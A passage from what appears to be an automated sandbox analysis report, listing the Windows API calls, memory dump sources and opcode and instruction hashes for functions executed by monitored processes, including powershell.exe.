                                                    • Opcode Fuzzy Hash: 83a485ff38295047d939051d06738713f97737eb9bdaad739882da4b42065593
                                                    • Instruction Fuzzy Hash: 98F0C239504748DFEB20DF15D889766FFA0EF14726F08C09ADE498B316D775A504CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01CAA36A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNELBASE(?), ref: 01CAA39C
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    • Opcode ID: 5ce7e0423bc57bdb648efa9e53b049522a08d63c39345f0623d62c519ae76bce
                                                    • Instruction ID: 98dc58e44e29e1407a00a2adaadfa0c71731523bbface63a8afe1caa1aea3f7a
                                                    • Opcode Fuzzy Hash: 5ce7e0423bc57bdb648efa9e53b049522a08d63c39345f0623d62c519ae76bce
                                                    • Instruction Fuzzy Hash: CBF0C235505744DFEB22DF06D885765FFA0EF04B25F48C09ADD094B312D3B5E508CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01CAAA42, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 01CAAA71
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    • Opcode ID: e7555b556cd80fee3e93a24fdacd2d5faa50a4f5780fb99dccccc10c38a52c74
                                                    • Instruction ID: aea771293e1a1fe848d28a0077de457b774e1ab38b80f546e5a861378e4df5e3
                                                    • Opcode Fuzzy Hash: e7555b556cd80fee3e93a24fdacd2d5faa50a4f5780fb99dccccc10c38a52c74
                                                    • Instruction Fuzzy Hash: 7DF0AF31504741CFEB12CF06D98A761FB90DB04625F48C09ADD094B252D274E904CEA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01CAA974, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 01CAA9C8
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: 155cbddf4ce8b38b25d528c6cb841fe660109b2d12c5477363680b43c9bef978
                                                    • Instruction ID: bd1c43ea4e4891289531407c86d3606fa576a952a97c56ae80675a1c4c15354f
                                                    • Opcode Fuzzy Hash: 155cbddf4ce8b38b25d528c6cb841fe660109b2d12c5477363680b43c9bef978
                                                    • Instruction Fuzzy Hash: 041191715093809FD712CF25DC55B96BFA4DF02224F0980ABED458B263D275A908CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01CAA996, Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 01CAA9C8
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: 042dcb3fda6dbbb74c638875e43d29614457036dd124ebc65d7e2c93d25c0918
                                                    • Instruction ID: 1df7232cb2b13f00feee386d92aac359709c229ee47aa09376422ab49ba7976f
                                                    • Opcode Fuzzy Hash: 042dcb3fda6dbbb74c638875e43d29614457036dd124ebc65d7e2c93d25c0918
                                                    • Instruction Fuzzy Hash: D101F275500780DFEB21DF2ADC857A6FBE4DF00224F48C0ABDC098B642D275E904CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 029F07F7, Relevance: .0, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2137432029.00000000029F0000.00000040.00000040.sdmp, Offset: 02930000, based on PE: true
                                                    • Associated: 0000000F.00000002.2137034492.0000000002930000.00000008.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 19215bd002ae7d154ac761e2ca47da01776c93534bd7955ac9232bcc00e50b35
                                                    • Instruction ID: 1821e157caec3a2a4709092d356fa6d399dd38a0c4a1d64a33139b2e6f803eb8
                                                    • Opcode Fuzzy Hash: 19215bd002ae7d154ac761e2ca47da01776c93534bd7955ac9232bcc00e50b35
                                                    • Instruction Fuzzy Hash: 3F01867650D780AFD7128F16EC40862FFB8DE86660709C4DFEC898B613D125A909CB72
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 05710860, Relevance: .0, Instructions: 39COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2145170499.0000000005710000.00000040.00000001.sdmp, Offset: 05710000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 15867257e6c68661655fc61db6bd48cbaca8d515ad29eb7c5d5bb91963a3c8af
                                                    • Instruction ID: 4b73b948f475813f6c5c8aca1bf2d00343ee48629bf358e103a46c0b809fdf10
                                                    • Opcode Fuzzy Hash: 15867257e6c68661655fc61db6bd48cbaca8d515ad29eb7c5d5bb91963a3c8af
                                                    • Instruction Fuzzy Hash: CCF0A72110D2D16FC317537858649957F724F8706471E02DBD1D2CB1E7DA484C86D3A6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 029F081E, Relevance: .0, Instructions: 27COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2137432029.00000000029F0000.00000040.00000040.sdmp, Offset: 02930000, based on PE: true
                                                    • Associated: 0000000F.00000002.2137034492.0000000002930000.00000008.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e5843c1d92e5ad40d66f29bcf7a9a6420f76d542820cab5d5a9d7e23e8e519f4
                                                    • Instruction ID: 027ffa2e62585a021e801a0358cedacdcef76aca216acca0442a0b60384c86be
                                                    • Opcode Fuzzy Hash: e5843c1d92e5ad40d66f29bcf7a9a6420f76d542820cab5d5a9d7e23e8e519f4
                                                    • Instruction Fuzzy Hash: 91E092766047008BD750DF0AFC41852F794EB84A30B18C07FDC0D8B711D135B504CAA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01CA23F4, Relevance: .0, Instructions: 15COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132757247.0000000001CA2000.00000040.00000001.sdmp, Offset: 01CA2000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2868198fb60b645150fee8bd481def3a0129d9c5a7c75d69e41eeb53adff59e4
                                                    • Instruction ID: d2de21bed4a80f2aa9d16474416127fb923022a091410bfc1128610aecd0bdd7
                                                    • Opcode Fuzzy Hash: 2868198fb60b645150fee8bd481def3a0129d9c5a7c75d69e41eeb53adff59e4
                                                    • Instruction Fuzzy Hash: 27D05E79204B928FE7178A1CC1A4B953BA4AF55B08F8644F9E840CB6A3C768E681E200
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01CA23BC, Relevance: .0, Instructions: 14COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132757247.0000000001CA2000.00000040.00000001.sdmp, Offset: 01CA2000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 285b2982a0affb3fd78d8f39a2bb8ad111b7dc6e6f60cf684530f7bee8d5dca8
                                                    • Instruction ID: a37fc8805144ec47d6e921c8f45722f57b0bd9d5295dd9273c7daf2afa58f7a9
                                                    • Opcode Fuzzy Hash: 285b2982a0affb3fd78d8f39a2bb8ad111b7dc6e6f60cf684530f7bee8d5dca8
                                                    • Instruction Fuzzy Hash: F6D05E343016828FEB16CA1CC194F5977E8AF41B04F4644E8BD008B266C3A8E980C600
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Analysis Process: powershell.exe PID: 920 Parent PID: 2336 powershell.exeCOMMON

                                                    Executed Functions

                                                    Function 01B8ACB7, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01B8AD37
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    • Opcode ID: e856abf23fd2f81e0fde0d339fac13b9bf57b47d048698a96d89f4b7caa34513
                                                    • Instruction ID: 1f8622535332872be168defd17f2019b64a3d6449a7491d242c549ca9dafa7fe
                                                    • Opcode Fuzzy Hash: e856abf23fd2f81e0fde0d339fac13b9bf57b47d048698a96d89f4b7caa34513
                                                    • Instruction Fuzzy Hash: BA219F76509784AFEB238F25DC44B92BFB4EF06310F0884DBE9858B563D371A908DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01B8ACEE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01B8AD37
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    • Opcode ID: 6d90d780d8e97dd1b818b3a5dd5963e10b6f15b6b54242b0abe18581903fe752
                                                    • Instruction ID: 16e3161054fe467294e8d5cd79b593d67d376e6d87e1c12f2d6ccc77eab47ccf
                                                    • Opcode Fuzzy Hash: 6d90d780d8e97dd1b818b3a5dd5963e10b6f15b6b54242b0abe18581903fe752
                                                    • Instruction Fuzzy Hash: 1411AC76500700DFEB21DF65D884BA6FBE4EF04621F08C4AAED4ACB622D731E418CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01B8B2CC, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01B8B329
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    • Opcode ID: 65bee721a779d1fff2b725b293a4e061c3b7db0c8577dcaf89fb54d2930a1e51
                                                    • Instruction ID: 9a0d15aa70e17e5e21ecc6eb099ff5eaa35fa7e972114f6ef759bb5ec48322b8
                                                    • Opcode Fuzzy Hash: 65bee721a779d1fff2b725b293a4e061c3b7db0c8577dcaf89fb54d2930a1e51
                                                    • Instruction Fuzzy Hash: 2B11A071508780AFDB228F15DC85F52FFB4EF46220F09849AED854B663D275A818DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01B8B2EE, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01B8B329
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    • Opcode ID: 736a468884dd022e197016fb7a7ef38484964abb8c16803cc5da9bcf1d6e2e09
                                                    • Instruction ID: f7fdd47c33781d6ba7cec1305c35f11fe19b40c15d15c49f5a9001d542a2c379
                                                    • Opcode Fuzzy Hash: 736a468884dd022e197016fb7a7ef38484964abb8c16803cc5da9bcf1d6e2e09
                                                    • Instruction Fuzzy Hash: D001AD32400700DFEB21AF69D989B21FBA0EF08B21F08C59ADD490B612D371A418DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02210118, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 022101D0
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    • Opcode ID: 268df796b064066ae483fa92860e375ecc48182cd89b3d57a74141306b206542
                                                    • Instruction ID: c1a8677af791607306d2c7ddf65aedd5234732f26e853dbddf99beba03c11620
                                                    • Opcode Fuzzy Hash: 268df796b064066ae483fa92860e375ecc48182cd89b3d57a74141306b206542
                                                    • Instruction Fuzzy Hash: 1B316A7650E3C08FE7138B759C65A91BFB4AF03210F0E84DBD884CF1A3D6699949CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0221067A, Relevance: 1.6, APIs: 1, Instructions: 93fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0221072D
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 56ad7350c5f2e5ebd6c7ad9decea3c3c5910dc7443b0755380cd74b7c2bf0302
                                                    • Instruction ID: d57781bc928420988912632182d09153a2d4fe40313d33d34a0c109eb35722bc
                                                    • Opcode Fuzzy Hash: 56ad7350c5f2e5ebd6c7ad9decea3c3c5910dc7443b0755380cd74b7c2bf0302
                                                    • Instruction Fuzzy Hash: 7F318271504384AFE722CF65CC45F92BFF8EF06210F09849EE9858B292D375A949CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02210D32, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 02210DD6
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    • Opcode ID: a39c4aa2032d32638c36e55f50cd6e65bc72640918fc4decc6141a43d06f7aed
                                                    • Instruction ID: 42bd2c688d2a1533d586adb168cc49828bf176788cc07da2e7100d1e622d0cc6
                                                    • Opcode Fuzzy Hash: a39c4aa2032d32638c36e55f50cd6e65bc72640918fc4decc6141a43d06f7aed
                                                    • Instruction Fuzzy Hash: 8C31B6B1509384AFE712CB65DC45F96BFE8DF06214F0884AAE944CF293D375A909CB72
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01B8AF24, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,6EDED775,00000000,00000000,00000000,00000000), ref: 01B8AFBE
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    • Opcode ID: 53c34ec901db831e573901e64672d7732ef2f7124be712d52189b77158b6eced
                                                    • Instruction ID: c918e9af017fb1ca7a82001d073c9ab22a423374783eb1eb66289bef4fd53dbd
                                                    • Opcode Fuzzy Hash: 53c34ec901db831e573901e64672d7732ef2f7124be712d52189b77158b6eced
                                                    • Instruction Fuzzy Hash: B921E6B2509380AFE712CF20DC45B96BFB8EF06320F0884DBE985DB193D2659949C771
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01B8BD1E, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,6EDED775,00000000,00000000,00000000,00000000), ref: 01B8BDBC
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    • Opcode ID: 2d623a4ac16454552888a161ffa5683ba7bd87b9bc22b1f66e49c17b774adc56
                                                    • Instruction ID: e0e9e68c4e2f2317d2151f88561e9e65c866011432dd6f51825014bd002a2528
                                                    • Opcode Fuzzy Hash: 2d623a4ac16454552888a161ffa5683ba7bd87b9bc22b1f66e49c17b774adc56
                                                    • Instruction Fuzzy Hash: 91318471509380AFE712CB61DC55F96BFB8EF06210F0885DBE985DB193D225A909C771
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02210FEE, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0221109E
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    • Opcode ID: 84364d30b1fe1b832d0732386722de5313de1fc23625adbb59811f1c3504ce8b
                                                    • Instruction ID: d92e13efa791e5d8966e08b2ef390e6132983cb7df90af2b0478267f4562ec90
                                                    • Opcode Fuzzy Hash: 84364d30b1fe1b832d0732386722de5313de1fc23625adbb59811f1c3504ce8b
                                                    • Instruction Fuzzy Hash: 19316FB550E3C06FD3138B358C55B56BFB4AF43610F1A81DBD8848F2A3D629A909C7A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01B8B01D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,6EDED775,00000000,00000000,00000000,00000000), ref: 01B8B0AE
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    • Opcode ID: ecc8fdfd57a7c1724ad90bb3f0a7beb604a6094044243528b372cd050ee3a0b5
                                                    • Instruction ID: 7c19262513fed1d3dd506f3de8a73b91ca39d4e47d576348436a7c2d33543175
                                                    • Opcode Fuzzy Hash: ecc8fdfd57a7c1724ad90bb3f0a7beb604a6094044243528b372cd050ee3a0b5
                                                    • Instruction Fuzzy Hash: 0621D371509380AFE722CF25CC44FA6BFB8EF06220F08849AE945CB192D764E909CB71
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01B8A1A8, Relevance: 1.6, APIs: 1, Instructions: 81COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01B8A23E
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleCtrlHandler
                                                    • String ID:
                                                    • API String ID: 1513847179-0
                                                    • Opcode ID: 7f0caf31da15e7b241d08ea463ad529ace2a1bd04b4fe7fd3e8042a77c478dcd
                                                    • Instruction ID: fffcc77c7ce079ecd8c2ef04f8cb8336a3e4445f75aa867ef2eff4b2cf669401
                                                    • Opcode Fuzzy Hash: 7f0caf31da15e7b241d08ea463ad529ace2a1bd04b4fe7fd3e8042a77c478dcd
                                                    • Instruction Fuzzy Hash: C121D37140E3C06FD3128B358C55B66BFB4EF43620F1981DBD8848F693D229A919C7A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02210784, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,6EDED775,00000000,00000000,00000000,00000000), ref: 02210819
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    • Opcode ID: bb70c50f1c1042750b92873873ff388bc771bf9fc60234619f80a424d5d5c7e2
                                                    • Instruction ID: 32471fba273eda08334ceaa7a56be23bcbf3159862904e91900bfe69cbaaddf0
                                                    • Opcode Fuzzy Hash: bb70c50f1c1042750b92873873ff388bc771bf9fc60234619f80a424d5d5c7e2
                                                    • Instruction Fuzzy Hash: A7210D75408780AFE712CB159C45FA3BFA8EF46720F0981DBFD848B157D2246909C771
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02210464, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02210502
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    • Opcode ID: cbd9b9cea6720cdccd4bf0f811d4db084ab89b999f505c30774b45485f6126e8
                                                    • Instruction ID: b4b60d26caa15d8c7bdef042a7602e650696504a1392c4e44352e7dea9d6eb0d
                                                    • Opcode Fuzzy Hash: cbd9b9cea6720cdccd4bf0f811d4db084ab89b999f505c30774b45485f6126e8
                                                    • Instruction Fuzzy Hash: A2217F7540E3C0AFD3128B759C55B62BFB4EF87610F1A81CBD8848F693D225A919C7B2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 022106AE, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0221072D
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: a8ad3cd139f1fbdecfc37a102274579ac43438b0191c212e168a4d64fd47cd0f
                                                    • Instruction ID: 24760b11af6cb6d3bf5780334238e905295e94c9fecf0e32bbe03f6f1eb31e78
                                                    • Opcode Fuzzy Hash: a8ad3cd139f1fbdecfc37a102274579ac43438b0191c212e168a4d64fd47cd0f
                                                    • Instruction Fuzzy Hash: 7821AE71510304EFE720DFA5CC85FA6FBE8EF08210F04846AED498B295D771E945CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02210854, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,6EDED775,00000000,00000000,00000000,00000000), ref: 022108E5
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 669ed5dabd0918da1f8fc906e0d44fc0e6584e415ab0318ec7cf657023586890
                                                    • Instruction ID: 13c363927f95e32ac56078692240de7df8e9a9da3dc7889aa83805859c8c2356
                                                    • Opcode Fuzzy Hash: 669ed5dabd0918da1f8fc906e0d44fc0e6584e415ab0318ec7cf657023586890
                                                    • Instruction Fuzzy Hash: DE21C471409380AFE722CF60DC45F56BFB8EF06310F0984DBE9448B153C265A909CB71
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01B8A8B4, Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01B8A94A
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    • Opcode ID: 69c4a00be388edadc7ab022b62f971546dc81ebf1076620fdd0044f302a6a9e8
                                                    • Instruction ID: 977ca47ad0f8d59d77361df8a608246f7d80f9ab5c74396317c7dfb6cf8ffc94
                                                    • Opcode Fuzzy Hash: 69c4a00be388edadc7ab022b62f971546dc81ebf1076620fdd0044f302a6a9e8
                                                    • Instruction Fuzzy Hash: 8D21A77540D780AFD3138B25DC51B62BFB4EF87710F0981DBE8848B653D224A919C7B2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02210D66, Relevance: 1.6, APIs: 1, Instructions: 71registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 02210DD6
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    • Opcode ID: a14f1980b00119a26c89194ca5c70700d9324c23ac99d06e04866b20a260a1fc
                                                    • Instruction ID: 62588731e9fd22a07d89693b0c09da527d099f1402d7ec44cff04e0776c28d07
                                                    • Opcode Fuzzy Hash: a14f1980b00119a26c89194ca5c70700d9324c23ac99d06e04866b20a260a1fc
                                                    • Instruction Fuzzy Hash: D321AEB1610204AFF720DF65DC85FA6FBE8EF09210F04846AEC48DB286D775E944CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01B8BD52, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,6EDED775,00000000,00000000,00000000,00000000), ref: 01B8BDBC
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    • Opcode ID: d0d5c74c691c5e1b73399402b1db2f2f46548284f8ec820168d1556af406dc9d
                                                    • Instruction ID: cfb8df8335190bb136b2d262168686160fc6f26d7eb76999eae6cff3dfeb21b4
                                                    • Opcode Fuzzy Hash: d0d5c74c691c5e1b73399402b1db2f2f46548284f8ec820168d1556af406dc9d
                                                    • Instruction Fuzzy Hash: C7119072500304EFEB21DF65DC85FA6F7A8EF04720F0489AAF9459A141D670A904CBB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02210F34, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 02210FB0
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    • Opcode ID: e9088f4e605ccfa774d5fbd73f641f172747306bf6a657c2eb207244dd527364
                                                    • Instruction ID: 5f4c7204c82ec12dabb1e1d610582141dd9617a0831c57d4c57b2ae5b88b521b
                                                    • Opcode Fuzzy Hash: e9088f4e605ccfa774d5fbd73f641f172747306bf6a657c2eb207244dd527364
                                                    • Instruction Fuzzy Hash: 91218B7150D3C09FDB128B25CC55B92BFB4AF13224F0D84DAEC888F293D6649948CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0221137E, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    • Opcode ID: f33e2adf36ba8deee9d5b032a5e1bf8789414fc2a7b9f01377d9414b261dbe8e
                                                    • Instruction ID: 4015dcc7378626e7b9df4173ab8c8a441421f528c4adc33fd449af633eae5e71
                                                    • Opcode Fuzzy Hash: f33e2adf36ba8deee9d5b032a5e1bf8789414fc2a7b9f01377d9414b261dbe8e
